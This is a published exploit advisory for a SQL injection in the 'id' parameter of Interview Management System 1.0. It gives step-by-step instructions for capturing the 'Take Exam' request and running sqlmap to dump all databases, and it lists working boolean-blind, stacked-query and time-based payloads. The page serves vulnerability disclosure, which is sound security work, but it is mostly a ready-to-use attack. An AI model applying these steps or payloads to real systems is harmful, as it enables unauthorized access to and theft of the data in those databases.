Interview Management System 1.0 SQL Injection

Interview Management System version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | 6f500736eaaaf674a20dd78c81247c0c

# Exploit Title: Interview Management System 1.0 - 'id' SQL Injection
# Exploit Author: Saeed Bala Ahmed (r0b0tG4nG)
# Date: 2020-12-10
# Google Dork: N/A
# Vendor Homepage:
# Software Link:
# Affected Version: Version 1
# Patched Version: Unpatched
# Category: Web Application
# Tested on: Parrot OS

Step 1. Login to the application with any verified user credentials

Step 2. Click on View Candidates page and select take exam. If there is no
candidate, click on "Add New Candidate" page, fill details and add new

Step 3. Click on "Take Exam" and capture the request in burpsuite.

Step 4. Save request and run sqlmap on request file using command " sqlmap
-r request -p id --time-sec=5 --dbs ".

Step 5. This will inject successfully and you will have an information
disclosure of all databases contents.

Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (7913=7913) THEN 1 ELSE (SELECT 5980

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=1;SELECT SLEEP(5)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 6708 FROM (SELECT(SLEEP(5)))QTiW)

Related Posts